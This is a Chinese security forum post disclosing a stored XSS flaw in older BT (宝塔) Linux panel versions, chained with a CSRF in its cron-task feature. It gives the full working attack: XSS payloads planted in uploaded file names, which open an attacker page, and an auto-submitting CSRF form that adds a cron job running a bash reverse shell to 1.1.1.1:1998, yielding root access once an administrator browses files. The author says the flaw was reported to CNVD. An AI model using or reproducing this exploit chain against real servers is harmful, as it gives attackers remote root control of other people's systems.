安全矩阵

 找回密码
 立即注册
搜索
查看: 2151|回复: 0

宝塔linux面板 <6.0 存储形xss 0day漏洞

[复制链接]

221

主题

233

帖子

792

积分

高级会员

Rank: 4

积分
792
发表于 2021-6-29 17:22:14 | 显示全部楼层 |阅读模式
宝塔linux面板 <6.0 存储形xss 0day漏洞原创 kkk mr [url=]漏洞推送[/url] 4天前
收录于话题
#Web渗透
3个
去年就挖到了,交了CVND。感觉现在用5.x版本的已经很少了。

通过以下命令来安装5.9版本宝塔面板

Centos安装命令:

           

yum install -y wget && wget -O install.sh http://download.bt.cn/install/install.sh && sh install.sh
Ubuntu/Deepin安装命令:

           

wget -O install.sh http://download.bt.cn/install/install-ubuntu.sh && sudo bash install.sh
假设我们已经通过网站漏洞或者ftp弱口令等,可以在web目录下进行文件上传

在web目录下上传一个文件名为 <img src=x>的文件

在宝塔后台浏览文件,触发payload

但是由于宝塔的session加了httponly,所以我们是无法获取到宝塔的cookie的,但是我们可以配合计划任务的一个csrf的漏洞来达到权限提升的效果
POC
  1. <html>
  2.   <!-- CSRF PoC - generated by Burp Suite Professional -->
  3.   <body>
  4.   <script>history.pushState('', '', '/')</script>
  5.     <form action="http://1.1.1.1:8888/crontab?action=AddCrontab" method="POST">
  6.       <input type="hidden" name="name" value="test" />
  7.       <input type="hidden" name="type" value="minute-n" />
  8.       <input type="hidden" name="where1" value="5" />
  9.       <input type="hidden" name="hour" value="" />
  10.       <input type="hidden" name="minute" value="" />
  11.       <input type="hidden" name="week" value="" />
  12.       <input type="hidden" name="sType" value="toShell" />
  13.       <input type="hidden" name="sBody" value="bash -i >& /dev/tcp/1.1.1.1/1998 0>&1" />
  14.       <input type="hidden" name="sName" value="" />
  15.       <input type="hidden" name="backupTo" value="localhost" />
  16.       <input type="hidden" name="urladdress" value="" />
  17.       <input type="hidden" name="save" value="" />
  18.       <input type="hidden" name="sBody" value="bash -i >& /dev/tcp/1.1.1.1/1998 0>&1" />
  19.       <input type="hidden" name="urladdress" value="" />
  20.       <input type="submit" id="a" value="Submit request" />
  21.     </form>
  22.   </body>
  23.   <script>
  24.     document.getElementById('a').click()
  25. </script>
  26. </html>
复制代码
​ 修改poc中的ip地址,保存到网页上传到test.com中,当宝塔管理员访问这个页面以后,会自动跳转到

后台会自动添加反弹shell的计划任务


现在准备就绪,只要让管理员打开这个网页就可以了
回到上传文件的地方,因为有触发点有字符数限制,所以用多个语句构造,因为执行顺序的关系,可能需要刷新一下文件管理即可触发

新建三个文件,文件名分别为
  1. a<img src=x onerror="a=String.fromCharCode(47)">
  2. b<img src=x onerror="b='.com'">
  3. c<img src=x onerror="window.open(a+a+'test'+b)">
复制代码
​payload触发以后会自动打开test.com网页

将上一步CSRF的payload部署到test.com,管理员浏览文件的时候即可触发,触发后五分钟会反弹shell

root权限~

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-29 06:30 , Processed in 0.012881 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表